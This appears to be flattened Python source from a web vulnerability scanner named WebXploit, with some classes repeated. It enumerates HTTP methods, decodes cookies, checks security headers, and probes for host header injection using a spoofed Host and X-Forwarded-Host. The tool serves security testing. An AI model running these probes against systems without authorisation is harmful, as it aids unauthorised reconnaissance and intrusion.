class WebXploit(): def __init__(self): self.target_url = "" self.target_port = "" self.target_host = "" self.logger = logger self.recon_headers = Headers() self.recon_cookies = Cookies() self.recon_methods = HTTPMethods() self.recon_others = Others() self.sql = Sql_injection() self.crlf = Crlf_injection() self.host = Host_injection() self.apache = Apache2_tests() self.wordpress = Wordpress() self.Print = Print() def parse_target(self, target): try: self.target_url = target flag = urlparse(target) self.target_host = flag.scheme + "://" + flag.netloc print("Target"+str(self.target_host)) self.target_port = flag.port except Exception as e: self.logger.error_log(e) self.Print.printer(None, self.target_url, None) def launch(self): os.system("toilet -F metal WebXploit - Recon") def get_headers(self, target): self.recon_headers.execute_all_func(self.target_url) def get_cookies(self, target): self.recon_cookies.execute_all_func(target) def execute_random_vulns(self, target): self.recon_others.execute_all_func(target) def get_HTTP_methods(self, target): self.recon_methods.test_allowed_methods(target)
class WebXploit(): def __init__(self): self.target_url = "" self.target_port = "" self.target_host = "" self.logger = logger self.recon_headers = Headers() self.recon_cookies = Cookies() self.recon_methods = HTTPMethods() self.recon_others = Others() self.sql = Sql_injection() self.crlf = Crlf_injection() self.host = Host_injection() self.apache = Apache2_tests() self.wordpress = Wordpress() self.Print = Print() def parse_target(self, target): try: self.target_url = target flag = urlparse(target) self.target_host = flag.scheme + "://" + flag.netloc print("Target" + str(self.target_host)) self.target_port = flag.port except Exception as e: self.logger.error_log(e) self.Print.printer(None, self.target_url, None) def launch(self): os.system("toilet -F metal WebXploit - Recon") def get_headers(self, target): self.recon_headers.execute_all_func(self.target_url) def get_cookies(self, target): self.recon_cookies.execute_all_func(target) def execute_random_vulns(self, target): self.recon_others.execute_all_func(target) def get_HTTP_methods(self, target): self.recon_methods.test_allowed_methods(target)
class HTTPMethods(): def __init__(self): self.Print = Print() self.logger = LoggingManager() self.verbs = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE'] def test_allowed_methods(self, target): for verb in self.verbs: try: req = requests.request(verb, target) print(verb, req.status_code, req.reason) if verb == 'TRACE' and 'TRACE / HTTP' in req.text: self.Print.printer(1, "Cross Site Tracing found", None) except requests.exceptions.ConnectionError as e: print("CONNECT :: Connection error occured. Retry using https") self.logger.recon_log(e) except Exception as e: self.logger.recon_log(e) print("Error while testing allowed methords. Check recon log")
class Cookies(): """ """ def __init__(self): self.cookies = "" self.Print = Print() self.logger = LoggingManager() def execute_all_func(self, target): self.get_cookies(target) self.base64_check(target) def get_cookies(self, target): data = "" try: req = requests.get(target) self.cookies = req.cookies.items() except Exception as e: print("Error occured while accessing cookies. Check recon log") self.logger.recon_log(e) for name, value in self.cookies: length = len(name) length = 25 - length data = data + name + ": ".rjust(length) + value self.Print.printer(0, "Cookies: ", data) def base64_check(self, target): for name, value in self.cookies: try: flag = base64.decodestring( value.replace("%3D", "=").encode("ascii")).decode("cp437") length = len(name) length = 25 - length data = name + ": ".rjust(length) + flag self.Print.printer(0, "Base64 Encoded Cookies: (Attention!)", data) except binascii.Error as e: continue
class Host_injection(): def __init__(self): self.logger = LoggingManager() self.Print = Print() def host_header_inj(self, target): headers = {'Host': 'www.google.com'} header = {'X-Forwarded-Host': 'www.google.com'} check_host = "google.com" try: req = requests.get(target, headers=headers, allow_redirects=False) if req.status_code == 302 or req.status_code == 301: location = req.headers['Location'] if check_host in location: self.Print.printer(1, "Host Header injection", target, req.status_code) req = requests.get(target, headers=header, allow_redirects=False) if req.status_code == 302 or req.status_code == 301: location = req.headers['Location'] if check_host in location: self.Print.printer(1, "Host Header injection", target, req.status_code) except SSLError as e: self.Print.printer(-1, "Host Header injection: Manual check needed", target, req.status_code) except ConnectionError: self.Print.printer(-1, "Host Header injection: ConnectionError", target, req.status_code) except Exception as e: self.logger.module_log(e) print("Error occured while checking host header injection. Check\ module log for details")
class Headers(): def __init__(self): self.Print = Print() self.logger = LoggingManager() def execute_all_func(self, target): self.get_headers(target) self.check_headers(target) def get_headers(self, target): data = "" try: req = requests.head(target) except requests.exceptions.MissingSchema as e: print("Non valid URL. Please specify a valid URL.") self.logger.error_log(e) exit() except Exception as e: print("Error occured while accessing headers.Check recon log") self.logger.recon_log(e) exit() for name, value in req.headers.items(): length = len(name) length = 50 - length data = data + name + ": ".rjust(length) + value + "\n" self.Print.printer(0, "Response Headers: ", data) def check_headers(self, target): req = requests.head(target) print("\n") self.Print.printer(0, "Response header Analysis: ", None) try: xssprotect = req.headers['X-XSS-Protection'] if xssprotect != '1; mode=block': self.Print.printer( 0, "X-XSS-Protection not set properly, XSS may be possible:", xssprotect) except: self.Print.printer( 0, "X-XSS-Protection not set, XSS may be possible", None) try: contenttype = req.headers['X-Content-Type-Options'] if contenttype != 'nosniff': self.Print.printer(0, "X-Content-Type-Options not set properly:", contenttype) except: self.Print.printer(0, "X-Content-Type-Options not set", None) try: hsts = req.headers['Strict-Transport-Security'] except: self.Print.printer( 0, "HSTS header not set, MITM attacks may be possible", None) try: csp = req.headers['Content-Security-Policy'] self.Print.printer(0, "Content-Security-Policy set: ", csp) except: self.Print.printer(0, "Content-Security-Policy missing", None)
class Headers: def __init__(self): self.Print = Print() self.logger = LoggingManager() def execute_all_func(self, target): self.get_headers(target) self.check_headers(target) def get_headers(self, target): data = "" try: req = requests.head(target) except requests.exceptions.MissingSchema as e: print("Non valid URL. Please specify a valid URL.") self.logger.error_log(e) exit() except Exception as e: print("Error occured while accessing headers.Check recon log") self.logger.recon_log(e) exit() for name, value in req.headers.items(): length = len(name) length = 50 - length data = data + name + ": ".rjust(length) + value + "\n" self.Print.printer(0, "Response Headers: ", data) def check_headers(self, target): req = requests.head(target) print("\n") self.Print.printer(0, "Response header Analysis: ", None) try: xssprotect = req.headers["X-XSS-Protection"] if xssprotect != "1; mode=block": self.Print.printer(0, "X-XSS-Protection not set properly, XSS may be possible:", xssprotect) except: self.Print.printer(0, "X-XSS-Protection not set, XSS may be possible", None) try: contenttype = req.headers["X-Content-Type-Options"] if contenttype != "nosniff": self.Print.printer(0, "X-Content-Type-Options not set properly:", contenttype) except: self.Print.printer(0, "X-Content-Type-Options not set", None) try: hsts = req.headers["Strict-Transport-Security"] except: self.Print.printer(0, "HSTS header not set, MITM attacks may be possible", None) try: csp = req.headers["Content-Security-Policy"] self.Print.printer(0, "Content-Security-Policy set: ", csp) except: self.Print.printer(0, "Content-Security-Policy missing", None)